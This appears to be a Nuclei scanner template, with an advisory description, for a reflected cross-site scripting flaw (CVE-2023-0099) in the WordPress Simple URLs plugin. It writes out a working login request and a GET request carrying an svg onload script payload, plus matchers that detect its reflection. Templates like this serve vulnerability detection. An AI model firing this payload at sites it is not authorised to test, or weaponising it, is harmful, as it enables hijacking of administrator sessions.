Description
The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
id: CVE-2023-0099
info:
name: Simple URLs < 115 - Cross Site Scripting
author: r3Y3r53
severity: medium
description: |
The plugin does not sanitise and escape some parameters before outputting them back in some pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
impact: |
Successful exploitation of this vulnerability can lead to session hijacking, defacement of websites, theft of sensitive information, and potential remote code execution.
remediation: Fixed in version 115
reference:
- https://wpscan.com/vulnerability/fd50f2d6-e420-4220-b485-73f33227e8f8
- https://wordpress.org/plugins/simple-urls/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0099
- http://packetstormsecurity.com/files/176983/WordPress-Simple-URLs-Cross-Site-Scripting.html
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-0099
cwe-id: CWE-79
epss-score: 0.01726
epss-percentile: 0.76388
cpe: cpe:2.3:a:getlasso:simple_urls:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: getlasso
product: simple_urls
framework: wordpress
tags: wpscan,packetstorm,cve,cve2023,xss,simple-urls,authenticated,wordpress,wp,wp-plugin,getlasso,vuln
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-content/plugins/simple-urls/admin/assets/js/import-js.php?search=%3C/script%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body, "</script><svg/onload=alert(document.domain)>")'
- 'contains(body_2, "search_term")'
condition: and
# digest: 4b0a00483046022100eaa5fe7fa8763ff05f917831cd6a1e07214dc843b8fe1c4a5d9e830739f2e126022100988446b1048aadd1424a11a3b2dd1f6ea1cd10c8dfd4bd03c4971133346aea19:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.